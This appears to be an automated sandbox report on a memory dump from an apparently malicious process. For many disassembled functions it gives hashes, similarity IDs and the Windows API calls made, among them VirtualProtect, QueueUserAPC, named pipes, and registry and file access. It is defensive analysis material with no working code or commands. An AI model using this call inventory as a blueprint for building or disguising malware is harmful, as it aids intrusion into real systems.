Opcode ID: f136c754a6513b84aed929e7fb8ae081271b4a0f2b7a18fca46c60e443f76d42
Instruction ID: f08148f84158ef26d26322c9ce87a24e71a96b71310bf1a793ecc371e16d7a55
Opcode Fuzzy Hash: f136c754a6513b84aed929e7fb8ae081271b4a0f2b7a18fca46c60e443f76d42
Instruction Fuzzy Hash: A141D8B5D10209EFDF20EFA4C9C49AEBBBDEB08341F1444AAE512E6250D771AB45DB10

Uniqueness

Uniqueness Score: -1.00%

Function 0334AC28, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 108stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0336082C: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,03342AFA,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,03358655), ref: 03360838
Part of subcall function 0336082C: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,03342AFA,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 03360896
Part of subcall function 0336082C: lstrcpy.KERNEL32(00000000,00000000), ref: 033608A6

lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 0334AC77
wsprintfA.USER32 ref: 0334ACA7
GetLastError.KERNEL32 ref: 0334AD1C

Strings

`, xrefs: 0334ACD8

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
String ID: `
API String ID: 324226357-1850852036
Opcode ID: 5dad9e0c6bdf8312dad3f9f08575f13c020beb7d53367968dcbb1e0b94a89608
Instruction ID: 8a9870d5e2e2429a722f9c73335cb9cd5e0bcf190fdfe062e3c4bd40dcc647d1
Opcode Fuzzy Hash: 5dad9e0c6bdf8312dad3f9f08575f13c020beb7d53367968dcbb1e0b94a89608
Instruction Fuzzy Hash: 5B319D7650070AAFDF21EFA5CCC4AAB7BEDEF44351F048429F9159A190EB30E915CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0335F2D4, Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0335A743: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000), ref: 0335A751

RtlAllocateHeap.NTDLL(00000000,?), ref: 0335F33C
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0335F38D

Part of subcall function 0335AA30: CreateFileW.KERNEL32(00000000,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 0335AA70
Part of subcall function 0335AA30: GetLastError.KERNEL32 ref: 0335AA7A
Part of subcall function 0335AA30: WaitForSingleObject.KERNEL32(000000C8), ref: 0335AA9F
Part of subcall function 0335AA30: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 0335AAC2
Part of subcall function 0335AA30: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 0335AAEA
Part of subcall function 0335AA30: WriteFile.KERNEL32(00000001,00001388,?,?,00000000), ref: 0335AAFF
Part of subcall function 0335AA30: SetEndOfFile.KERNEL32(00000001), ref: 0335AB0C
Part of subcall function 0335AA30: CloseHandle.KERNEL32(00000001), ref: 0335AB24

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,?,?,0334CBAA,?,?,?,?,?,?), ref: 0335F3C2
HeapFree.KERNEL32(00000000,?,?,?,?,0334CBAA,?,?,?,?,?,?,00000000,?,00000000), ref: 0335F3D2

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
String ID:
API String ID: 4200334623-0
Opcode ID: 616705c93bfc61247e57298a28125f371d5e7710c76f34cf86071b1497d7c216
Instruction ID: 4455a96925a4ed364aa371c9ff528c561e7578e0b194c7b880967edd6c8bedb7
Opcode Fuzzy Hash: 616705c93bfc61247e57298a28125f371d5e7710c76f34cf86071b1497d7c216
Instruction Fuzzy Hash: B1311676900119FFEB10EFA5DCC8CAEBBADEF08350B144565FA01D7124D771AE519BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03346B3A, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 03346B69
SetEvent.KERNEL32(?), ref: 03346BB3
TlsSetValue.KERNEL32(00000001), ref: 03346BED
TlsSetValue.KERNEL32(00000000), ref: 03346C09

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Value$Event
String ID:
API String ID: 3803239005-0
Opcode ID: 5f6022e844f11912e8f7a64f99b5f7d0b814be7799a8ecc4c52a2f8150e62420
Instruction ID: f681d18ae7b5d7d028594e36d68743716bd44f84e63a02f6840e93b5901d68f9
Opcode Fuzzy Hash: 5f6022e844f11912e8f7a64f99b5f7d0b814be7799a8ecc4c52a2f8150e62420
Instruction Fuzzy Hash: 2421B532500608AFCB21DF55DCC699ABBEAFB42760F144529F512CA560C731FC50DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0335EBCF, Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 033580B6: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000), ref: 033580F2
Part of subcall function 033580B6: memset.NTDLL ref: 03358173
Part of subcall function 033580B6: memset.NTDLL ref: 03358188

RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 0335EC27
lstrcmpi.KERNEL32(00000000,?), ref: 0335EC4E
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0335EC93
HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 0335ECA4

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$Freememset$Allocatelstrcmpimemcpy
String ID:
API String ID: 1065503980-0
Opcode ID: 1f31514a995c2cc4704afbacbb143479d2a8b9b5a42a9a2b3d6e4f501b3678ba
Instruction ID: 7783b7c1a19c76b298c9e8389a9b03b79f5e8c76001963876683b7ca542dc103
Opcode Fuzzy Hash: 1f31514a995c2cc4704afbacbb143479d2a8b9b5a42a9a2b3d6e4f501b3678ba
Instruction Fuzzy Hash: 7F21457AA00209FFDF20EFA5DCC4E9EBBB9AB04314F048465F905EA124D739EA449B50

Uniqueness

Uniqueness Score: -1.00%

Function 0335290F, Relevance: 6.1, APIs: 4, Instructions: 77stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0335293E
lstrlen.KERNEL32(00000000), ref: 0335294F

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

strcpy.NTDLL ref: 03352966
StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 03352970

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: AllocateHeaplstrlenmemsetstrcpy
String ID:
API String ID: 528014985-0
Opcode ID: bcd5a2fa7dd7a9a1b7c4f613f29563721bd0c65e71c892d65e8833a3c07aeb3e
Instruction ID: b25166c7f29fe83ab0f5f53f9716a74685afcef9e18cc7fd730cf35623e92bcd
Opcode Fuzzy Hash: bcd5a2fa7dd7a9a1b7c4f613f29563721bd0c65e71c892d65e8833a3c07aeb3e
Instruction Fuzzy Hash: 9321AC76504702AFE724AB64DCC9F2BB7ACAB45311F088819FC96CA291EBB5D4108B61

Uniqueness

Uniqueness Score: -1.00%

Function 03368D97, Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0644C0A0), ref: 03368DAD
RtlLeaveCriticalSection.NTDLL(0644C0A0), ref: 03368DC8
GetLastError.KERNEL32 ref: 03368E36
GetLastError.KERNEL32 ref: 03368E45

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: 40d0ad228fe27dbe416cae484c938c7e57a4e49481778b8f136f1c23c1d68027
Instruction ID: 11eb714811b517016985a66058a4ff401081347bfd1f47ae74969f27b25034c9
Opcode Fuzzy Hash: 40d0ad228fe27dbe416cae484c938c7e57a4e49481778b8f136f1c23c1d68027
Instruction Fuzzy Hash: 5A214836900208EFCB22DFA5D884A9EBBB8FF48711F048185F815A7224C734DA55DB91

Uniqueness

Uniqueness Score: -1.00%

Function 03349807, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 03348AB5: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,74E04DE0,00000000), ref: 03348ADB

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 03349859
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0334DD5B,?), ref: 0334986B
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,0334DD5B,?), ref: 03349883
CloseHandle.KERNEL32(?,?,?,?,?,?,0334DD5B,?), ref: 0334989E

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: File$CloseCreateHandleModuleNamePointerRead
String ID:
API String ID: 1352878660-0
Opcode ID: d9e6c14ef1faea09399239d02f7beb9dbfd74e3e6f3ef16469f9859367b4d9e0
Instruction ID: c6d20b25436417d341b489ce7dad71a27bbfbeb627c92e22ef885338ab54f590
Opcode Fuzzy Hash: d9e6c14ef1faea09399239d02f7beb9dbfd74e3e6f3ef16469f9859367b4d9e0
Instruction Fuzzy Hash: 36118B70A00228BEDB21ABA9CCC9FEFBEACEF41750F148061F915E5054D3319A50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 033433DF, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 033433EF

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001), ref: 03343411
lstrcpyW.KERNEL32(00000000,?), ref: 0334343D
lstrcatW.KERNEL32(00000000,?), ref: 03343450

Part of subcall function 0335F51A: strstr.NTDLL ref: 0335F5F2
Part of subcall function 0335F51A: strstr.NTDLL ref: 0335F645

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
String ID:
API String ID: 3712611166-0
Opcode ID: 197c4fb0c31bad41906d5c042648a07e00c95f171231cc3ae3b2b332f4e3d21a
Instruction ID: 1c6ae76835bbb817f8bfbfc8b303c6e464680859308b5c9c943c1552e45dc306
Opcode Fuzzy Hash: 197c4fb0c31bad41906d5c042648a07e00c95f171231cc3ae3b2b332f4e3d21a
Instruction Fuzzy Hash: BB11F67A900119BFDB12AFA5ECC8CDEBFACEF05364B048065F9059B110DB35EA55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0335D85B, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0337065C,033707F4,00000402,033707F4), ref: 0335D893

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

lstrcpy.KERNEL32(00000000,0337065C), ref: 0335D8AA
StrChrA.SHLWAPI(00000000,0000002E), ref: 0335D8B3
GetModuleHandleA.KERNEL32(00000000), ref: 0335D8D1

Part of subcall function 0335889B: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,0335A538,?,0337065C,0335A538,?,00000000,00000004,03358D1F,?,810C74C3), ref: 03358973
Part of subcall function 0335889B: VirtualProtect.KERNEL32(033707F4,00000004,03358D1F,03358D1F,0335A538,?,00000000,00000004,03358D1F,?,810C74C3,00000000,?,0336D580,0000001C,0334B898), ref: 0335898E
Part of subcall function 0335889B: RtlEnterCriticalSection.NTDLL(03371460), ref: 033589B3

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
String ID:
API String ID: 105881616-0
Opcode ID: b030309b339ec64d9ba3bab89fe25e72c418579164cb30be8370f56c4f82efd2
Instruction ID: afe2c924bbdf47ce285e65aa4eee549d20099f2d9569ed779ce1b19c02806f76
Opcode Fuzzy Hash: b030309b339ec64d9ba3bab89fe25e72c418579164cb30be8370f56c4f82efd2
Instruction Fuzzy Hash: 3C213834A00349EFDB15DFA9C888EAEBBB8AF44300F148059E856DB264DB74DA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03343FD9, Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03343FF4
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 03344018
RegCloseKey.ADVAPI32(?), ref: 03344070

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 03344041

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: QueryValue$AllocateCloseHeapOpen
String ID:
API String ID: 453107315-0
Opcode ID: 842bb8629e1defb9e53e03492e46c5981880d8556cdca3beecb396c64c8344e3
Instruction ID: 90b514dbe01d4dba9a77e88a0dfba1e7cd1c3d5ccf2a15cd94cdf357d7fb5838
Opcode Fuzzy Hash: 842bb8629e1defb9e53e03492e46c5981880d8556cdca3beecb396c64c8344e3
Instruction Fuzzy Hash: 5E21C4B5900108FFCB11EF95DC849EEBBBDEB88344F248466E902A6114D375AA50DB60

Uniqueness

Uniqueness Score: -1.00%

Function 033660A4, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0335D9B1,?,?,033584A7,00000000,0644C0E0), ref: 033660AF
RtlAllocateHeap.NTDLL(00000000,?), ref: 033660C7
memcpy.NTDLL(00000000,?,-00000008,?,?,?,0335D9B1,?,?,033584A7,00000000,0644C0E0), ref: 0336610B
memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 0336612C

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: a61d0e5dd0ef374d6333d6d154f455aac4954b0d72d385bcbc8e93a563d78c73
Instruction ID: 64c71620c5154556a42fde949bd8a1d5d31c011d140521ec64cb146f87832125
Opcode Fuzzy Hash: a61d0e5dd0ef374d6333d6d154f455aac4954b0d72d385bcbc8e93a563d78c73
Instruction Fuzzy Hash: 0A11E376A00215AFC720DB69DCC5A9EBBEEDB81290F184176E504D7150E7759E00CB60

Uniqueness

Uniqueness Score: -1.00%

Function 033526F3, Relevance: 6.1, APIs: 4, Instructions: 58threadCOMMON

Download Yara Rule

APIs

GlobalFix.KERNEL32(00000000), ref: 03352733
memset.NTDLL ref: 03352747
GetWindowThreadProcessId.USER32(00000000,?), ref: 03352754

Part of subcall function 0334F363: OpenProcess.KERNEL32(00000410,1D1D1D1D,03367DD4,76929BC0,00000000,03367DD4,0000001C,00000000,00000000,?,?,?,03367DD4), ref: 0334F3BD
Part of subcall function 0334F363: CloseHandle.KERNEL32(00000000,00000000,00000000,03367DE4,00000104,?,?,?,03367DD4), ref: 0334F3DB
Part of subcall function 0334F363: GetSystemTimeAsFileTime.KERNEL32(03367DD4), ref: 0334F443

GlobalUnWire.KERNEL32(00000000), ref: 0335277F

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
String ID:
API String ID: 3286078456-0
Opcode ID: 4837a69fc42f866a82d997515fa16eb7a22e84d016ee3a5fb1b6665e8acc3c4a
Instruction ID: 86042a1f16928faef8936d00b883645045be55f5a6175b6180431ee9daeb4512
Opcode Fuzzy Hash: 4837a69fc42f866a82d997515fa16eb7a22e84d016ee3a5fb1b6665e8acc3c4a
Instruction Fuzzy Hash: 6B113CB5900709AFD725EFB9ACC8F9EBABCAF48711F044115FD16F2285DB7096018B61

Uniqueness

Uniqueness Score: -1.00%

Function 0334C100, Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,0335FE3D,00000000,00000000), ref: 0334C11E
GetLastError.KERNEL32(?,?,?,0335FE3D,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,0335BDBD,?,0000001E), ref: 0334C126

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 2692c645ca1a9c4b94ef565e4ef488297b67b593ac1d8b0815093e7f6dd47647
Instruction ID: 0561359b61ead2582b7ecfdbee68eb07c117d3d0f63b39ac835b7901fbebfe25
Opcode Fuzzy Hash: 2692c645ca1a9c4b94ef565e4ef488297b67b593ac1d8b0815093e7f6dd47647
Instruction Fuzzy Hash: ED01887650A2517F9621EB765CCCC5BBBACEBC6760B104B19F86592540C6205804CA71

Uniqueness

Uniqueness Score: -1.00%

Function 03343186, Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 0334319A

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

mbstowcs.NTDLL ref: 033431B4
lstrlen.KERNEL32(?), ref: 033431BF
mbstowcs.NTDLL ref: 033431D9

Part of subcall function 0334BAF2: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 0334BB3E
Part of subcall function 0334BAF2: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000006,?), ref: 0334BB4A
Part of subcall function 0334BAF2: memset.NTDLL ref: 0334BB92
Part of subcall function 0334BAF2: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0334BBAD
Part of subcall function 0334BAF2: lstrlenW.KERNEL32(0000002C), ref: 0334BBE5
Part of subcall function 0334BAF2: lstrlenW.KERNEL32(?), ref: 0334BBED
Part of subcall function 0334BAF2: memset.NTDLL ref: 0334BC10
Part of subcall function 0334BAF2: wcscpy.NTDLL ref: 0334BC22

Part of subcall function 03360757: HeapFree.KERNEL32(00000000,00000000,033529D3,00000000), ref: 03360763

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
String ID:
API String ID: 1961997177-0
Opcode ID: 0fb2d17bffc19ff028294c80851b2dd291c9a2aa52ab71dddda4cb82449dbc79
Instruction ID: d83279547b28d4f29df80744ca32d0fc11d88399210a6fc76c23bc9342e19ccb
Opcode Fuzzy Hash: 0fb2d17bffc19ff028294c80851b2dd291c9a2aa52ab71dddda4cb82449dbc79
Instruction Fuzzy Hash: 2301CC7B800304BBCB21ABA59CC5FCBBFACDF84720F108026B6059B100EB74E9108BA0

Uniqueness

Uniqueness Score: -1.00%

Function 033557AE, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0334D08B,?,00000000), ref: 033557C1
lstrlen.KERNEL32(0644BF48,?,?,?,0334D08B,?,00000000), ref: 033557E2
RtlAllocateHeap.NTDLL(00000000,00000014), ref: 033557FA
lstrcpy.KERNEL32(00000000,0644BF48), ref: 0335580C

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
String ID:
API String ID: 1929783139-0
Opcode ID: 3cd1d8bd3815d45ff9c94228641e8d8121a9970568a74f16b5c0d0fb659cd95a
Instruction ID: c43daa2892839fc269f8c69b2f221f91100e39b41d0539513c7a8fa8fc008653
Opcode Fuzzy Hash: 3cd1d8bd3815d45ff9c94228641e8d8121a9970568a74f16b5c0d0fb659cd95a
Instruction Fuzzy Hash: DC01A576A04644EFD721EBA998C4E5EBFBCAB49301F044069FD46D7205D73496048B60

Uniqueness

Uniqueness Score: -1.00%

Function 03360D43, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

RtlInitializeCriticalSection.NTDLL(03371460), ref: 03360D67
RtlInitializeCriticalSection.NTDLL(03371440), ref: 03360D7D
GetVersion.KERNEL32(?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 03360D8E
GetModuleHandleA.KERNEL32(00001623,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 03360DC2

Part of subcall function 03352558: GetModuleHandleA.KERNEL32(?,00000001,77639EB0,00000000,?,?,?,?,00000000,03360DA5), ref: 03352570
Part of subcall function 03352558: LoadLibraryA.KERNEL32(?), ref: 03352611
Part of subcall function 03352558: FreeLibrary.KERNEL32(00000000), ref: 0335261C

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
String ID:
API String ID: 1711133254-0
Opcode ID: 89b02d0be08e5a34c63237776391cf025aed015f9d5727b83cee9c9fede7f294
Instruction ID: 8c134a76011e33c4e607f372ec4ea440108ad2f7771f05865ee94fa3cf88668f
Opcode Fuzzy Hash: 89b02d0be08e5a34c63237776391cf025aed015f9d5727b83cee9c9fede7f294
Instruction Fuzzy Hash: C2115B7BE643118FC730FFAAE8C96457BBCA748355F40852AD545DB20DCBB468848F50

Uniqueness

Uniqueness Score: -1.00%

Function 03350C51, Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,7673D3B0,?,74E05520,03342073,00000000,?,?,?), ref: 03350C58
RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 03350C70
memcpy.NTDLL(0000000C,?,00000001), ref: 03350C86

Part of subcall function 033655C4: StrChrA.SHLWAPI(?,?,7673D3B0,0644C0D4,00000000,?,033541F5,?,00000020,0644C0D4), ref: 033655E9
Part of subcall function 033655C4: StrTrimA.SHLWAPI(?,0336D49C,00000000,?,033541F5,?,00000020,0644C0D4), ref: 03365608
Part of subcall function 033655C4: StrChrA.SHLWAPI(?,?,?,033541F5,?,00000020,0644C0D4), ref: 03365614

HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 03350CB8

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$AllocateFreeTrimlstrlenmemcpy
String ID:
API String ID: 3208927540-0
Opcode ID: 55d8e4ff8fb5b8a67385cb80185eb4768aabdff1b1d0126039bc747349161ae0
Instruction ID: 6279f332fcb82d426fa0688afa2cca7876fa8eb1c656242993167247e2ad86af
Opcode Fuzzy Hash: 55d8e4ff8fb5b8a67385cb80185eb4768aabdff1b1d0126039bc747349161ae0
Instruction Fuzzy Hash: A701F736601741EFE731EA12DCC4F2BBEACFB81B51F048029FA699D190C77598098B60

Uniqueness

Uniqueness Score: -1.00%

Function 033422D4, Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(03371488), ref: 033422DF
Sleep.KERNEL32(0000000A), ref: 033422E9
SetEvent.KERNEL32 ref: 03342340
RtlLeaveCriticalSection.NTDLL(03371488), ref: 0334235F

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CriticalSection$EnterEventLeaveSleep
String ID:
API String ID: 1925615494-0
Opcode ID: b8a017ac49fafa5fdd653076c623a20afd6f948011a6094683770d5f31e586b8
Instruction ID: 3d848c40b6f48613b3312014336e35719ba061a801c7c7f368646b80aa0915ac
Opcode Fuzzy Hash: b8a017ac49fafa5fdd653076c623a20afd6f948011a6094683770d5f31e586b8
Instruction Fuzzy Hash: 86015E72E44308EFE720FBA1ECC5F5A7BACEB04791F004455F615EA184E7B49940DB61

Uniqueness

Uniqueness Score: -1.00%

Function 03344A1D, Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0334B10E: lstrlen.KERNEL32(00000000,00000000,00000000,033676BF,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0334B113
Part of subcall function 0334B10E: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0334B128
Part of subcall function 0334B10E: wsprintfA.USER32 ref: 0334B144
Part of subcall function 0334B10E: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 0334B160

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 03344A4B
GetFileSize.KERNEL32(00000000,00000000), ref: 03344A5A
CloseHandle.KERNEL32(00000000), ref: 03344A64
GetLastError.KERNEL32 ref: 03344A6C

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
String ID:
API String ID: 4042893638-0
Opcode ID: ca7e065fa5cf6e962e625f25397fee175901dff45144fb7a1d7e2b978bc6e27f
Instruction ID: 3f784724bf1f79b6acf3355034993db36b6f801111c10d42714c5e84509bdf8e
Opcode Fuzzy Hash: ca7e065fa5cf6e962e625f25397fee175901dff45144fb7a1d7e2b978bc6e27f
Instruction Fuzzy Hash: 86F08C32508318BBD721AB67DCCAF9BFEACEF41760F10812AF51AD5090E734A5448BA5

Uniqueness

Uniqueness Score: -1.00%

Function 03343E33, Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,03371248,00000001), ref: 03343E57
GetLastError.KERNEL32(?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 03343EA2

Part of subcall function 0334B6A7: CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,03368A07), ref: 0334B6BE
Part of subcall function 0334B6A7: QueueUserAPC.KERNEL32(?,00000000,?), ref: 0334B6D3
Part of subcall function 0334B6A7: GetLastError.KERNEL32(00000000), ref: 0334B6DE
Part of subcall function 0334B6A7: TerminateThread.KERNEL32(00000000,00000000), ref: 0334B6E8
Part of subcall function 0334B6A7: CloseHandle.KERNEL32(00000000), ref: 0334B6EF
Part of subcall function 0334B6A7: SetLastError.KERNEL32(00000000), ref: 0334B6F8

GetLastError.KERNEL32(033498D6,00000000,00000000,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 03343E8A
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 03343E9A

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
String ID:
API String ID: 1700061692-0
Opcode ID: 4feff69f81082020f330f7e7f28db783b03e0f95b1ccabdccac398442a67228b
Instruction ID: a93cc1ad7881847d2695bc4f8153f3e5bf5bc72943307be3cdabf9dda80f97f8
Opcode Fuzzy Hash: 4feff69f81082020f330f7e7f28db783b03e0f95b1ccabdccac398442a67228b
Instruction Fuzzy Hash: 78F02876305341AFE320AB699CC9E37BB9CEB49331F100234F926C36D0C7640C558A70

Uniqueness

Uniqueness Score: -1.00%

Function 0334AB3D, Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(033710C0,00000000), ref: 0334AB49
RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 0334AB64
lstrcpy.KERNEL32(00000000,?), ref: 0334AB8D
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,033477C7,?), ref: 0334ABAE

Part of subcall function 03367C17: SetEvent.KERNEL32(?,?,0334F0A9), ref: 03367C2C
Part of subcall function 03367C17: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0334F0A9), ref: 03367C4C
Part of subcall function 03367C17: CloseHandle.KERNEL32(00000000,?,0334F0A9), ref: 03367C55
